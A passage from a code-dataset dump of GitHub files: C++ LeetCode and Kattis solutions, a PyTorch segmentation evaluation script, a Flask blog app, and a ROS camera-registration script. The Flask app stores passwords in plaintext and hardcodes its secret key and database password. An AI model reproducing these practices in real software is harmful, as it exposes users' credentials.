"max_line_length": 61,
"num_lines": 48,
"path": "/leetcode/21.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode *next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* mergeTwoLists(ListNode* l1, ListNode* l2) {\n ListNode *r = nullptr;\n ListNode *head = nullptr;\n ListNode *nextNode;\n while (l1 != nullptr || l2 != nullptr) {\n if (l1 == nullptr) {\n nextNode = new ListNode(l2 -> val, nullptr);\n l2 = l2 -> next;\n } else if (l2 == nullptr) {\n nextNode = new ListNode(l1 -> val, nullptr);\n l1 = l1 -> next;\n } else if (l1 -> val <= l2 -> val) {\n nextNode = new ListNode(l1 -> val, nullptr);\n l1 = l1 -> next;\n } else {\n nextNode = new ListNode(l2 -> val, nullptr);\n l2 = l2 -> next;\n }\n if (head == nullptr) {\n head = nextNode;\n r = head;\n } else {\n r -> next = nextNode;\n r = r -> next; \n }\n \n }\n return head;\n }\n};\n\nint main() {\n Solution a = Solution();\n cout << \"Hello world\";\n}"
},
{
"alpha_fraction": 0.41649195551872253,
"alphanum_fraction": 0.4325646460056305,
"avg_line_length": 31.522727966308594,
"blob_id": "919aa3c71a057be44c135f4d1f7181ed9c86b700",
"content_id": "07fa26680e2343cf439a67e5da57e8bd7793fe28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1431,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 44,
"path": "/leetcode/743.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n vector<int> dis = vector<int>(103, -1);\n queue<pair<int, int>> q;\n vector<vector<pair<int, int>>> ds = vector<vector<pair<int, int>>>(103);\n int networkDeplayTime(vector<vector<int>>& times, int n, int k) {\n for (auto time: times)\n ds[time[0]].push_back(make_pair(time[1], time[2]));\n\n q.push(make_pair(k, 0));\n while (!q.empty()) {\n int u = q.front().first;\n int w = q.front().second;\n q.pop();\n if (dis[u] != -1 && dis[u] <= w)\n continue;\n dis[u] = w;\n for (auto edge: ds[u]) {\n int v = edge.first;\n int c = edge.second;\n q.push(make_pair(v, w + c));\n }\n }\n if (any_of(dis.begin() + 1, dis.begin() + 1 + n, [](int x) { return x == -1; })) {\n return -1;\n }\n else\n return *max_element(dis.begin() + 1, dis.begin() + 1 + n);\n }\n};\n\nint main() {\n Solution a = Solution(); \n vector<vector<int>> v { { 1, 2, 1 } };\n cout << a.networkDeplayTime(v, 2, 2);\n}\n"
},
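The networkDeplayTime solution above relaxes distances with a plain FIFO queue, re-pushing a node whenever a shorter path to it appears (a label-correcting, SPFA-style search that can revisit nodes many times). For contrast, a hedged sketch of textbook Dijkstra with a min-heap, O(E log V) on non-negative weights; the 1-based node convention follows the entry above and the helper name is illustrative:

```
#include <queue>
#include <vector>
using namespace std;

// adj[u] holds (neighbour, weight) edges; returns distances from src,
// with -1 marking unreachable nodes. Nodes are numbered 1..n.
vector<int> dijkstra(const vector<vector<pair<int,int>>>& adj, int n, int src) {
    const int INF = 1e9;
    vector<int> dist(n + 1, INF);
    priority_queue<pair<int,int>, vector<pair<int,int>>, greater<>> pq;
    dist[src] = 0;
    pq.push({0, src});
    while (!pq.empty()) {
        auto [d, u] = pq.top(); pq.pop();
        if (d > dist[u]) continue;            // stale heap entry, skip
        for (auto [v, w] : adj[u])
            if (dist[u] + w < dist[v]) {
                dist[v] = dist[u] + w;
                pq.push({dist[v], v});
            }
    }
    for (int i = 1; i <= n; i++)
        if (dist[i] == INF) dist[i] = -1;
    return dist;
}
```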
{
"alpha_fraction": 0.3310924470424652,
"alphanum_fraction": 0.3445378243923187,
"avg_line_length": 21.84000015258789,
"blob_id": "a12f7fdda9eaaa13def893c9cd01a3d45977204c",
"content_id": "af3422136398a4c6f3836372c580afc9ca34e6d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1190,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 50,
"path": "/katis/moviecollection.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n\r\nint m, r;\r\nconst int NMAX = 1e5 + 3;\r\nint b[NMAX*2], pos[NMAX];\r\n//----------------------------------------\r\nint getResult(int x) {\r\n int re = 0;\r\n while (x > 0) {\r\n re += b[x];\r\n x -= (x & (-x));\r\n }\r\n return re;\r\n}\r\n//----------------------------------------\r\nvoid update(int x, int value) {\r\n while (x < NMAX * 2) {\r\n b[x] += value;\r\n x += (x & (-x));\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n int test, u;\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n cin >> test; \r\n while (test--) {\r\n memset(b, 0, sizeof(b));\r\n memset(pos, 0, sizeof(pos));\r\n int uniqueValueNumber = 0;\r\n cin >> m >> r;\r\n rep(i, 1, m) {\r\n update(i, 1);\r\n pos[i] = m - i + 1;\r\n }\r\n rep(i, 1, r) {\r\n cin >> u;\r\n cout << m - getResult(pos[u]) << \" \";\r\n update(pos[u], -1);\r\n update(i + m, 1);\r\n pos[u] = i + m;\r\n }\r\n cout << endl;\r\n }\r\n}"
}
    }
] | 105
victorkitov/foreground_dataset | https://github.com/victorkitov/foreground_dataset | 91db4b1b3edddab405a156aeff5b444ccfa0fe82 | 628348356f96c0b58d88058e4e71f09826efd0aa | f88bfd4826689c3290c8e085d9abcaedb1deb727 | refs/heads/master | 2023-01-21T14:57:23.887346 | 2020-11-07T15:44:57 | 2020-11-07T15:44:57 | 310,875,832 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5461398959159851,
"alphanum_fraction": 0.5620549917221069,
"avg_line_length": 34.11274337768555,
"blob_id": "72e3c753ec04a61dcfff77add65d26405b26c224",
"content_id": "e48b4198420a2be13db93dbe699942e249f47892",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7163,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 204,
"path": "/eval.py",
"repo_name": "victorkitov/foreground_dataset",
"src_encoding": "UTF-8",
"text": "import argparse\nimport logging\nimport os\nimport random\nimport re\nimport sys\nimport time\nimport collections\nimport glob\nimport cv2\nimport numpy as np\nimport torch\nfrom skimage import io, transform\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms, utils\nimport torchvision.transforms.functional as F\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, random_split\nimport scipy.misc\nfrom PIL import Image\nimport models.resnet as lw\nimport models.fast_scnn as fs\n\n\nNORMALISE_PARAMS = [1./255, # SCALE\n np.array([0.485, 0.456, 0.406]).reshape((1, 1, 3)), # MEAN\n np.array([0.229, 0.224, 0.225]).reshape((1, 1, 3))] # STD\n\nMODEL = 'lw_refine'\nSNAPSHOT_DIR = './ckpt/'\nCKPT_PATH = './ckpt/lw_refine.pth.tar'\n\n\nclass Normalise(object):\n\n def __init__(self, scale, mean, std):\n self.scale = scale\n self.mean = mean\n self.std = std\n\n def __call__(self, sample):\n image = sample['image']\n return {'image': (self.scale * image - self.mean) / self.std, 'mask' : sample['mask']}\n\nclass ToTensor(object):\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n image = image.transpose((2, 0, 1))\n return {'image': torch.from_numpy(image),\n 'mask': torch.from_numpy(mask)}\n \nclass Resize(object):\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n image = Image.fromarray(image.astype('uint8'))\n t = transforms.Compose([transforms.Resize((800, 800))]) \n return {'image': np.array(t(image)),\n 'mask': mask}\n\nclass Dataset(Dataset):\n\n def __init__(self, data_file, data_dir, transform_trn=None, transform_val=None):\n \n with open(data_file, 'r') as f:\n datalist = f.readlines()\n self.datalist = [(k, v) for k, v in map(lambda x: x.strip('\\n').split(' '), datalist)]\n self.root_dir = data_dir\n self.transform_trn = transform_trn\n self.transform_val = transform_val\n self.stage = 'train'\n\n def set_stage(self, stage):\n self.stage = stage\n\n def __len__(self):\n return len(self.datalist)\n\n def __getitem__(self, idx):\n img_name = os.path.join(self.root_dir, self.datalist[idx][0])\n msk_name = os.path.join(self.root_dir, self.datalist[idx][1])\n def read_image(x):\n img_arr = np.array(Image.open(x))\n if len(img_arr.shape) == 2: # grayscale\n img_arr = np.tile(img_arr, [3, 1, 1]).transpose(1, 2, 0)\n return img_arr\n image = read_image(img_name)\n mask = np.array(Image.open(msk_name))\n if img_name != msk_name:\n assert len(mask.shape) == 2, 'Masks must be encoded without colourmap'\n sample = {'image': image, 'mask': mask}\n if self.stage == 'train':\n if self.transform_trn:\n sample = self.transform_trn(sample)\n elif self.stage == 'val':\n if self.transform_val:\n sample = self.transform_val(sample)\n return sample\n\n\n\ndef get_arguments():\n \n parser = argparse.ArgumentParser(description=\"Full Pipeline Training\")\n\n parser.add_argument('--model', type=str, default=MODEL,\n help='model name (default: lw_refine).')\n parser.add_argument(\"--test-dir\", type=str, default='./dataset/',\n help=\"Path to the test set directory.\")\n parser.add_argument(\"--test-list\", type=str, nargs='+', default='./dataset/test.txt',\n help=\"Path to the test set list.\")\n parser.add_argument(\"--out-dir\", type=str, nargs='+', default='test_result',\n help=\"Path to the test set result.\")\n parser.add_argument(\"--ckpt-path\", type=str, default=CKPT_PATH,\n help=\"Path to the checkpoint file.\")\n\n return parser.parse_args()\n\n\ndef load_ckpt(\n ckpt_path, ckpt_dict\n ):\n best_val 
= epoch_start = 0\n if os.path.exists(args.ckpt_path):\n ckpt = torch.load(ckpt_path)\n for (k, v) in ckpt_dict.items():\n if k in ckpt:\n v.load_state_dict(ckpt[k])\n return best_val, epoch_start\n\n\ndef validate(segmenter, val_loader, num_classes=-1, outdir='test_result'):\n \n pallete = [\n 0, 0, 0,\n 255, 255, 255,\n ]\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n segmenter.eval()\n cm = np.zeros((num_classes, num_classes), dtype=int)\n with torch.no_grad():\n for i, sample in enumerate(val_loader):\n input = sample['image']\n target = sample['mask']\n input = torch.autograd.Variable(torch.reshape(input, (1, 3, input.shape[2], input.shape[3]))).float().cuda()\n \n output = segmenter(input)\n\n if MODEL == 'lw_refine':\n output = cv2.resize(output[0, :num_classes].data.cpu().numpy().transpose(1, 2, 0),\n target.size()[1:][::-1],\n interpolation=cv2.INTER_CUBIC).argmax(axis=2).astype(np.uint8)\n \n else:\n output = output[0].squeeze(0)\n output = cv2.resize(output.data.cpu().numpy().transpose(1, 2, 0),\n target.size()[1:][::-1],\n interpolation=cv2.INTER_CUBIC).argmax(axis=2).astype(np.uint8)\n \n out_img = Image.fromarray(output.astype('uint8'))\n out_img.putpalette(pallete)\n out_img.save(outdir + '/seg{}.png'.format(i))\n \n im = cv2.imread(outdir + '/seg{}.png'.format(i), cv2.IMREAD_GRAYSCALE)\n kernel = np.ones((9, 9), np.uint8)\n opening = cv2.morphologyEx(im, cv2.MORPH_OPEN, kernel, iterations=2)\n cv2.imwrite(outdir + '/seg{}.png'.format(i), opening)\n\ndef main():\n global args\n args = get_arguments()\n torch.backends.cudnn.deterministic = True\n torch.cuda.manual_seed_all(42)\n global MODEL\n MODEL = args.model\n if MODEL == 'lw_refine':\n segmenter = nn.DataParallel(lw.rf_lw50(2, True)).cuda()\n best_val, epoch_start = load_ckpt(args.ckpt_path, {'segmenter' : segmenter})\n else:\n segmenter = fs.get_fast_scnn().to(torch.device(\"cuda:0\"))\n torch.cuda.empty_cache()\n if MODEL == 'fast_scnn':\n composed_val = transforms.Compose([Resize(), Normalise(*NORMALISE_PARAMS), ToTensor()])\n else:\n composed_val = transforms.Compose([Normalise(*NORMALISE_PARAMS), ToTensor()])\n testset = Dataset(data_file=args.test_list,\n data_dir=args.test_dir,\n transform_trn=None,\n transform_val=composed_val)\n\n test_loader = DataLoader(testset,\n batch_size=1,\n shuffle=False,\n num_workers=16,\n pin_memory=True)\n test_loader.dataset.set_stage('val')\n\n return validate(segmenter, test_loader, num_classes=2, outdir=args.out_dir)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6861313581466675,
"alphanum_fraction": 0.6897810101509094,
"avg_line_length": 27.842105865478516,
"blob_id": "cc18ac6fa9b71b9876d7da5d50291d231d9eb41f",
"content_id": "0b5a2ac73d2d712f329a83aa6571b1449f51a457",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 548,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 19,
"path": "/README.md",
"repo_name": "victorkitov/foreground_dataset",
"src_encoding": "UTF-8",
"text": "# BF_Style\n\n\nTo download pretrained models for testing (in **ckpt**): \n```\n./load_models.sh\n```\n\nTo test on images from **test.txt**:\n```\npython eval.py --model lw_refine\n```\nOther arguments:\n```\n--test-dir, default='./dataset/', path to the test set directory\n--test-list, default='./dataset/test.txt', path to the test set list\n--out-dir, default='test_result', path to the test set result\n--ckpt-path, default='./ckpt/lw_refine.pth.tar', path to the checkpoint file\n```\n"
}
] | 2 |
jjstonebarger/blogz | https://github.com/jjstonebarger/blogz | 4e2df6a4fed7d83b908931936aec878675c96917 | 5fc413ca4586d7054dc169c646dbcdd02c52c1fb | bb00f186ca47300a46943b58271d63ad63aa633b | refs/heads/master | 2020-04-01T14:55:35.806890 | 2018-10-17T02:18:31 | 2018-10-17T02:18:31 | 153,313,833 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6219310164451599,
"alphanum_fraction": 0.6245517134666443,
"avg_line_length": 35.255001068115234,
"blob_id": "a8076da604708339e1e52aa7e69b7ea6840d6cca",
"content_id": "800d0bca2f69c663040fc97684509467e17ec0a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7250,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 200,
"path": "/main.py",
"repo_name": "jjstonebarger/blogz",
"src_encoding": "UTF-8",
"text": "\"\"\" \nFor /login page:\n\nUser enters a username that is stored in the database with the correct password and is redirected to \nthe /newpost page with their username being stored in a session. X\n\nUser enters a username that is stored in the database with an incorrect password and is redirected \nto the /login page with a message that their password is incorrect. X\n\nUser tries to login with a username that is not stored in the database and is redirected to the \n/login page with a message that this username does not exist. X\n\nUser does not have an account and clicks \"Create Account\" and is directed to the /signup page. X\n\n=====================================================================================================\n\nFor /signup page:\n\nUser enters new, valid username, a valid password, and verifies password correctly and is redirected \nto the '/newpost' page with their username being stored in a session. x\n\nUser leaves any of the username, password, or verify fields blank and gets an error message that one \nor more fields are invalid. X\n\nUser enters a username that already exists and gets an error message that username already exists. X\n\nUser enters different strings into the password and verify fields and gets an error message that the \npasswords do not match. X\n\nUser enters a password or username less than 3 characters long and gets either an invalid username \nor an invalid password message. X\n\n=====================================================================================================\n\nFunctionality Check:\n\nUser is logged in and adds a new blog post, then is redirected to a page featuring the individual \nblog entry they just created (as in Build-a-Blog). X\n\nUser visits the /blog page and sees a list of all blog entries by all users. X\n\nUser clicks on the title of a blog entry on the /blog page and lands on the individual blog entry page. X\n\nUser clicks \"Logout\" and is redirected to the /blog page and is unable to access the /newpost page \n(is redirected to /login page instead) X\n\n========================================================================================================\n\nCreate Dynamic User Pages:\n\nUser is on the / page (\"Home\" page) and clicks on an author's username in the list and lands on the \nindividual blog user's page. X\n\nUser is on the /blog page and clicks on the author's username in the tagline and lands on the \nindividual blog user's page. 
X\n\nUser is on the individual entry page (e.g., /blog?id=1) and clicks on the author's username in\nthe tagline and lands on the individual blog user's page X\n\n\"\"\"\n\n\nfrom flask import Flask, request, redirect, render_template, session, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\n\ndb_name = 'blogs'\ndb_user = 'blogs'\ndb_pass = 'withoutaz'\ndb_server = 'localhost'\ndb_port = '8889'\n\napp = Flask(__name__)\napp.config['DEBUG'] = True \napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://'+db_user+':'+db_pass+'@'+db_server+':'+db_port+'/'+db_name\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'hellofriend'\n\nclass Blog(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.Text())\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n def __init__(self, title, body, owner):\n self.title = title\n self.body = body\n self.owner = owner\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(120), unique = True)\n password = db.Column(db.String(120))\n blogs = db.relationship('Blog', backref='owner')\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n\[email protected]_request\ndef require_login():\n allowed_routes = ['index', 'login', 'signup', 'blog']\n if request.endpoint not in allowed_routes and 'username' not in session:\n return redirect('/login') \n\[email protected]('/', methods=['GET'])\ndef index():\n users = User.query.all()\n return render_template('index.html', page_title= 'Blogz', users=users)\n\[email protected]('/login', methods=['POST', 'GET'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n user = User.query.filter_by(username=username).first()\n if user and user.password == password:\n session['username'] = username\n flash(\"Logged in\")\n return redirect('/blog/newpost')\n else:\n flash('User password incorrect, or user does not exist', 'error')\n return render_template('login.html')\[email protected]('/signup', methods=['POST', 'GET'])\ndef signup():\n username = \"\"\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n verify = request.form['verify']\n\n existing_user = User.query.filter_by(username=username).first()\n if existing_user:\n flash('Username already in use', 'error')\n elif len(username) < 3 or len(password) < 3:\n flash('Invalid username or invalid password')\n elif password != verify:\n flash('Passwords do not match', 'error')\n elif not existing_user and password == verify:\n new_user = User(username, password)\n db.session.add(new_user)\n db.session.commit()\n session['username'] = username\n return redirect('/blog/newpost')\n \n return render_template('signup.html', username = username)\[email protected]('/logout')\ndef logout():\n del session['username']\n flash('Logged out')\n return redirect('/blog')\n\[email protected]('/blog/newpost', methods=['POST', 'GET'])\ndef newpost():\n title = \"\"\n title_error = \"\"\n body = \"\"\n body_error = \"\"\n owner = User.query.filter_by(username = session['username']).first()\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n\n if not len(title) > 0:\n title_error = \"Title must contain a value\"\n \n if not len(body) > 0:\n body_error = \"Body must contian a value\"\n \n if not(title_error) and not(body_error):\n 
new_post = Blog(title = title, body = body, owner = owner )\n db.session.add(new_post)\n db.session.commit()\n db.session.refresh(new_post)\n return redirect('/blog?id='+ str(new_post.id)) \n \n return render_template('newpost.html', page_title = \"Add A Post\", title = title, \n title_error = title_error, body = body, body_error = body_error) \n\[email protected]('/blog', methods=['GET'])\ndef blog():\n blogs = []\n view = 'default'\n if request.args:\n id = request.args.get('id')\n username = request.args.get('user')\n if id:\n blogs.append(Blog.query.get(id))\n view = 'single'\n elif username:\n owner = User.query.filter_by(username = username).first()\n blogs = Blog.query.filter_by(owner = owner).all()\n else:\n blogs = Blog.query.all()\n return render_template('blog.html', page_title='Blogz', blogs=blogs,view=view)\n\nif __name__ == '__main__':\n app.run()"
}
] | 1 |
BerkeleyAutomation/perception | https://github.com/BerkeleyAutomation/perception | 5a3030674b26ea053982a8a2b4ad28ffa9ce41d5 | 6d838860ba0c1b35be6d0bc1511e99a3d12e66a7 | d38b5f2bed05352186d976dd5c045da02d127e21 | refs/heads/master | 2022-05-04T23:01:04.327748 | 2022-03-26T05:24:03 | 2022-03-28T18:01:31 | 72,058,950 | 74 | 38 | Apache-2.0 | 2016-10-27T01:19:32 | 2022-02-10T03:58:52 | 2022-03-28T18:01:31 | Python |
[
{
"alpha_fraction": 0.4692997932434082,
"alphanum_fraction": 0.47959235310554504,
"avg_line_length": 36.073307037353516,
"blob_id": "f50666299ca86792b8101e112df9cc8970d5d919",
"content_id": "3de9c10650b059cf4026a301cd4ec576ac17faa6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19723,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 532,
"path": "/tools/register_camera.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to register sensors to a chessboard for the YuMi setup\nAuthors: Jeff Mahler and Brenton Chu\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport time\nimport traceback\n\nimport cv2\nimport numpy as np\nimport rosgraph.roslogging as rl\nimport rospy\nfrom autolab_core import (\n CameraChessboardRegistration,\n Point,\n PointCloud,\n RigidTransform,\n YamlConfig,\n keyboard_input,\n)\nfrom visualization import Visualizer3D as vis3d\nfrom yumipy import YuMiConstants as YMC\nfrom yumipy import YuMiRobot\n\nfrom perception import RgbdSensorFactory\n\nglobal clicked_pt\nclicked_pt = None\npt_radius = 2\npt_color = (255, 0, 0)\n\n\ndef click_gripper(event, x, y, flags, param):\n global clicked_pt\n if event == cv2.EVENT_LBUTTONDBLCLK:\n clicked_pt = np.array([x, y])\n logging.info(\"Clicked: {}\".format(clicked_pt))\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a camera to a robot\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/register_camera.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n # get known tf from chessboard to world\n T_cb_world = RigidTransform.load(config[\"chessboard_tf\"])\n\n # initialize node\n rospy.init_node(\"register_camera\", anonymous=True)\n logging.getLogger().addHandler(rl.RosStreamHandler())\n\n # get camera sensor object\n for sensor_frame, sensor_data in config[\"sensors\"].iteritems():\n logging.info(\"Registering %s\" % (sensor_frame))\n sensor_config = sensor_data[\"sensor_config\"]\n registration_config = sensor_data[\"registration_config\"].copy()\n registration_config.update(config[\"chessboard_registration\"])\n\n # open sensor\n try:\n sensor_type = sensor_config[\"type\"]\n sensor_config[\"frame\"] = sensor_frame\n logging.info(\"Creating sensor\")\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n logging.info(\"Starting sensor\")\n sensor.start()\n ir_intrinsics = sensor.ir_intrinsics\n logging.info(\"Sensor initialized\")\n\n # register\n reg_result = CameraChessboardRegistration.register(\n sensor, registration_config\n )\n T_camera_world = T_cb_world * reg_result.T_camera_cb\n\n logging.info(\"Final Result for sensor %s\" % (sensor_frame))\n logging.info(\"Rotation: \")\n logging.info(T_camera_world.rotation)\n logging.info(\"Quaternion: \")\n logging.info(T_camera_world.quaternion)\n logging.info(\"Translation: \")\n logging.info(T_camera_world.translation)\n\n except Exception:\n logging.error(\"Failed to register sensor {}\".format(sensor_frame))\n traceback.print_exc()\n continue\n\n # fix the chessboard corners\n if config[\"fix_orientation_cb_to_world\"]:\n # read params\n num_pts_x = config[\"grid_x\"]\n num_pts_y = config[\"grid_y\"]\n grid_width = config[\"grid_width\"]\n grid_height = config[\"grid_height\"]\n gripper_height = config[\"gripper_height\"]\n grid_center_x = config[\"grid_center_x\"]\n grid_center_y = config[\"grid_center_y\"]\n\n # determine robot poses\n robot_poses = []\n for i in range(num_pts_x):\n x = (\n -float(grid_width) / 2\n + grid_center_x\n + float(i * grid_width) / num_pts_x\n )\n for j in range(num_pts_y):\n y = (\n -float(grid_height) / 2\n + grid_center_y\n + float(j * grid_height) / num_pts_y\n )\n\n # form robot pose\n R_robot_world = np.array(\n [[1, 0, 0], [0, 0, 1], [0, -1, 
0]]\n )\n t_robot_world = np.array([x, y, gripper_height])\n T_robot_world = RigidTransform(\n rotation=R_robot_world,\n translation=t_robot_world,\n from_frame=\"gripper\",\n to_frame=\"world\",\n )\n robot_poses.append(T_robot_world)\n\n # start robot\n y = YuMiRobot(tcp=YMC.TCP_SUCTION_STIFF)\n y.set_z(\"fine\")\n y.reset_home()\n global clicked_pt\n\n # iteratively go to poses\n robot_points_camera = []\n for robot_pose in robot_poses:\n # reset clicked pt\n clicked_pt = None\n\n # move to pose\n y.right.goto_pose(robot_pose, wait_for_res=True)\n\n # capture image\n color_im, depth_im, _ = sensor.frames()\n depth_im = depth_im.inpaint(0.25)\n cv2.namedWindow(\"click\")\n cv2.setMouseCallback(\"click\", click_gripper)\n while True:\n if clicked_pt is None:\n cv2.imshow(\"click\", color_im.data)\n else:\n im = color_im.data.copy()\n cv2.circle(\n im,\n tuple(clicked_pt.tolist()),\n pt_radius,\n pt_color,\n -1,\n )\n cv2.imshow(\"click\", im)\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\") and clicked_pt is not None:\n logging.info(\"Moving to next pose\")\n break\n\n # store clicked pt in 3D\n logging.info(\"Point collection complete\")\n depth = depth_im[clicked_pt[1], clicked_pt[0]]\n p = ir_intrinsics.deproject_pixel(\n depth, Point(clicked_pt, frame=ir_intrinsics.frame)\n )\n\n robot_points_camera.append(p.data)\n\n # reset\n y.reset_home()\n y.stop()\n\n # collect\n true_robot_points_world = PointCloud(\n np.array([T.translation for T in robot_poses]).T,\n frame=ir_intrinsics.frame,\n )\n est_robot_points_world = T_camera_world * PointCloud(\n np.array(robot_points_camera).T, frame=ir_intrinsics.frame\n )\n mean_true_robot_point = np.mean(\n true_robot_points_world.data, axis=1\n ).reshape(3, 1)\n mean_est_robot_point = np.mean(\n est_robot_points_world.data, axis=1\n ).reshape(3, 1)\n\n # fit a plane\n best_R_cb_world = None\n best_dist = np.inf\n k = 0\n K = 25\n num_poses = len(robot_poses)\n sample_size = int(num_poses * 0.3)\n min_inliers = int(num_poses * 0.6)\n dist_thresh = 0.0015\n true_robot_points_world._data = (\n true_robot_points_world._data - mean_true_robot_point\n )\n est_robot_points_world._data = (\n est_robot_points_world._data - mean_est_robot_point\n )\n while k < K:\n ind = np.random.choice(\n num_poses, size=sample_size, replace=False\n )\n H = est_robot_points_world.data[:, ind].dot(\n true_robot_points_world.data[:, ind].T\n )\n U, S, V = np.linalg.svd(H)\n R_cb_world = V.T.dot(U.T)\n\n fixed_robot_points_world = R_cb_world.dot(\n est_robot_points_world.data\n )\n diffs = fixed_robot_points_world - true_robot_points_world.data\n dists = np.linalg.norm(diffs, axis=0)\n inliers = np.where(dists < dist_thresh)[0]\n num_inliers = inliers.shape[0]\n\n print(k, num_inliers, np.mean(dists))\n\n if num_inliers >= min_inliers:\n ind = inliers\n H = est_robot_points_world.data[:, ind].dot(\n true_robot_points_world.data[:, ind].T\n )\n U, S, V = np.linalg.svd(H)\n R_cb_world = V.T.dot(U.T)\n\n fixed_robot_points_world = R_cb_world.dot(\n est_robot_points_world.data\n )\n diffs = (\n fixed_robot_points_world - true_robot_points_world.data\n )\n dists = np.linalg.norm(diffs, axis=0)\n\n mean_dist = np.mean(dists[ind])\n if mean_dist < best_dist:\n best_dist = mean_dist\n best_R_cb_world = R_cb_world\n k += 1\n\n R_cb_world = best_R_cb_world\n T_corrected_cb_world = RigidTransform(\n rotation=R_cb_world, from_frame=\"world\", to_frame=\"world\"\n )\n R_cb_world = R_cb_world.dot(T_cb_world.rotation)\n T_cb_world = RigidTransform(\n rotation=R_cb_world,\n 
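# compose the RANSAC-style rotation correction with the previously\n                # saved chessboard rotation; the translation is left unchanged\n                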
translation=T_cb_world.translation,\n                from_frame=T_cb_world.from_frame,\n                to_frame=T_cb_world.to_frame,\n            )\n            T_camera_world = T_cb_world * reg_result.T_camera_cb\n            T_cb_world.save(config[\"chessboard_tf\"])\n\n            # vis\n            if config[\"vis_points\"]:\n                _, depth_im, _ = sensor.frames()\n                points_world = T_camera_world * ir_intrinsics.deproject(\n                    depth_im\n                )\n                true_robot_points_world = PointCloud(\n                    np.array([T.translation for T in robot_poses]).T,\n                    frame=ir_intrinsics.frame,\n                )\n                est_robot_points_world = T_camera_world * PointCloud(\n                    np.array(robot_points_camera).T, frame=ir_intrinsics.frame\n                )\n                mean_est_robot_point = np.mean(\n                    est_robot_points_world.data, axis=1\n                ).reshape(3, 1)\n                est_robot_points_world._data = (\n                    est_robot_points_world._data\n                    - mean_est_robot_point\n                    + mean_true_robot_point\n                )\n                fixed_robot_points_world = (\n                    T_corrected_cb_world * est_robot_points_world\n                )\n                mean_fixed_robot_point = np.mean(\n                    fixed_robot_points_world.data, axis=1\n                ).reshape(3, 1)\n                fixed_robot_points_world._data = (\n                    fixed_robot_points_world._data\n                    - mean_fixed_robot_point\n                    + mean_true_robot_point\n                )\n                vis3d.figure()\n                vis3d.points(\n                    points_world,\n                    color=(0, 1, 0),\n                    subsample=10,\n                    random=True,\n                    scale=0.001,\n                )\n                vis3d.points(\n                    true_robot_points_world, color=(0, 0, 1), scale=0.001\n                )\n                vis3d.points(\n                    fixed_robot_points_world, color=(1, 1, 0), scale=0.001\n                )\n                vis3d.points(\n                    est_robot_points_world, color=(1, 0, 0), scale=0.001\n                )\n                vis3d.pose(T_camera_world)\n                vis3d.show()\n\n        # save transformation arrays based on setup\n        output_dir = os.path.join(config[\"calib_dir\"], sensor_frame)\n        if not os.path.exists(output_dir):\n            os.makedirs(output_dir)\n        pose_filename = os.path.join(\n            output_dir, \"%s_to_world.tf\" % (sensor_frame)\n        )\n        T_camera_world.save(pose_filename)\n        intr_filename = os.path.join(output_dir, \"%s.intr\" % 